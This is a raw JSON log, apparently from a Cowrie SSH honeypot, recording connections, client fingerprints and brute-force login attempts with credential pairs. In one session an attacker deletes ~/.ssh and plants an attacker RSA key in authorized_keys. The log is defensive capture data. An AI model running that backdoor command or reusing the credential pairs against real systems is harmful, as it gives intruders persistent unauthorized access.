sh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:10:44.209199Z","src_ip":"212.227.125.160","session":"aa0f0064f30e"}
{"eventid":"cowrie.login.failed","username":"username","password":"password","message":"login attempt [username/password] failed","sensor":"my-vps","timestamp":"2025-08-28T18:10:47.182005Z","src_ip":"212.227.125.160","session":"aa0f0064f30e"}
{"eventid":"cowrie.session.closed","duration":17.193835020065308,"message":"Connection lost after 17 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:10:48.097154Z","src_ip":"121.157.204.54","session":"ed1f7b9a2af7"}
{"eventid":"cowrie.session.closed","duration":17.193519115447998,"message":"Connection lost after 17 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:10:48.098069Z","src_ip":"121.157.204.54","session":"e789916464f8"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:10:48.427590Z","src_ip":"212.227.125.160","session":"aa0f0064f30e"}
{"eventid":"cowrie.session.connect","src_ip":"35.216.245.71","src_port":36552,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9e629ba2d38","protocol":"ssh","message":"New connection: 35.216.245.71:36552 (1.2.3.4:22) [session: e9e629ba2d38]","sensor":"my-vps","timestamp":"2025-08-28T18:11:06.136802Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:11:06.138344Z","src_ip":"35.216.245.71","session":"e9e629ba2d38"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T18:11:06.159610Z","src_ip":"35.216.245.71","session":"e9e629ba2d38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33910,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f5e1a8a29ec","protocol":"ssh","message":"New connection: 212.227.125.160:33910 (1.2.3.4:22) [session: 6f5e1a8a29ec]","sensor":"my-vps","timestamp":"2025-08-28T18:11:13.257843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:11:13.261291Z","src_ip":"212.227.125.160","session":"6f5e1a8a29ec"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:11:13.505540Z","src_ip":"212.227.125.160","session":"6f5e1a8a29ec"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:11:16.160878Z","src_ip":"35.216.245.71","session":"e9e629ba2d38"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"asteriskftp","message":"login attempt [ftpuser/asteriskftp] failed","sensor":"my-vps","timestamp":"2025-08-28T18:11:17.306523Z","src_ip":"212.227.125.160","session":"6f5e1a8a29ec"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:11:18.615803Z","src_ip":"212.227.125.160","session":"6f5e1a8a29ec"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.220","src_port":57996,"dst_ip":"1.2.3.4","dst_port":22,"session":"c202ea187b77","protocol":"ssh","message":"New connection: 171.243.150.220:57996 (1.2.3.4:22) [session: c202ea187b77]","sensor":"my-vps","timestamp":"2025-08-28T18:11:25.950847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T18:11:25.975512Z","src_ip":"171.243.150.220","session":"c202ea187b77"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T18:11:26.159414Z","src_ip":"171.243.150.220","session":"c202ea187b77"}
{"eventid":"cowrie.login.failed","username":"username","password":"password","message":"login attempt [username/password] failed","sensor":"my-vps","timestamp":"2025-08-28T18:11:27.706103Z","src_ip":"171.243.150.220","session":"c202ea187b77"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:11:29.413952Z","src_ip":"171.243.150.220","session":"c202ea187b77"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":36726,"dst_ip":"1.2.3.4","dst_port":22,"session":"f975118a8928","protocol":"ssh","message":"New connection: 199.195.253.95:36726 (1.2.3.4:22) [session: f975118a8928]","sensor":"my-vps","timestamp":"2025-08-28T18:11:30.822084Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:11:30.829829Z","src_ip":"199.195.253.95","session":"f975118a8928"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:11:30.969295Z","src_ip":"199.195.253.95","session":"f975118a8928"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer1234!@#$","message":"login attempt [root/Qwer1234!@#$] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:11:31.550521Z","src_ip":"199.195.253.95","session":"f975118a8928"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:11:31.872163Z","src_ip":"199.195.253.95","session":"f975118a8928"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:11:31.873128Z","src_ip":"199.195.253.95","session":"f975118a8928"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T18:11:31.874413Z","src_ip":"199.195.253.95","session":"f975118a8928"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:11:32.002388Z","src_ip":"199.195.253.95","session":"f975118a8928"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:11:32.735366Z","src_ip":"199.195.253.95","session":"f975118a8928"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T18:11:32.736045Z","src_ip":"199.195.253.95","session":"f975118a8928"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T18:11:32.856231Z","src_ip":"199.195.253.95","session":"f975118a8928"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:11:32.857118Z","src_ip":"199.195.253.95","session":"f975118a8928"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":37522,"dst_ip":"1.2.3.4","dst_port":22,"session":"635af6a6f691","protocol":"ssh","message":"New connection: 199.195.253.95:37522 (1.2.3.4:22) [session: 635af6a6f691]","sensor":"my-vps","timestamp":"2025-08-28T18:11:32.982250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:11:32.988523Z","src_ip":"199.195.253.95","session":"635af6a6f691"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:11:33.105720Z","src_ip":"199.195.253.95","session":"635af6a6f691"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T18:11:33.599165Z","src_ip":"199.195.253.95","session":"635af6a6f691"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:11:34.736550Z","src_ip":"199.195.253.95","session":"635af6a6f691"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":38304,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f11ba11ec09","protocol":"ssh","message":"New connection: 199.195.253.95:38304 (1.2.3.4:22) [session: 6f11ba11ec09]","sensor":"my-vps","timestamp":"2025-08-28T18:11:34.876120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T18:11:34.884007Z","src_ip":"199.195.253.95","session":"6f11ba11ec09"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T18:11:35.042242Z","src_ip":"199.195.253.95","session":"6f11ba11ec09"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:11:35.768677Z","src_ip":"199.195.253.95","session":"6f11ba11ec09"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:11:35.952027Z","src_ip":"199.195.253.95","session":"f975118a8928"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:11:35.952906Z","src_ip":"199.195.253.95","session":"6f11ba11ec09"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.227","src_port":17218,"dst_ip":"1.2.3.4","dst_port":22,"session":"4899ea7c8b44","protocol":"ssh","message":"New connection: 172.236.228.227:17218 (1.2.3.4:22) [session: 4899ea7c8b44]","sensor":"my-vps","timestamp":"2025-08-28T18:11:53.553149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:11:53.883476Z","src_ip":"172.236.228.227","session":"4899ea7c8b44"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T18:11:53.884113Z","src_ip":"172.236.228.227","session":"4899ea7c8b44"}
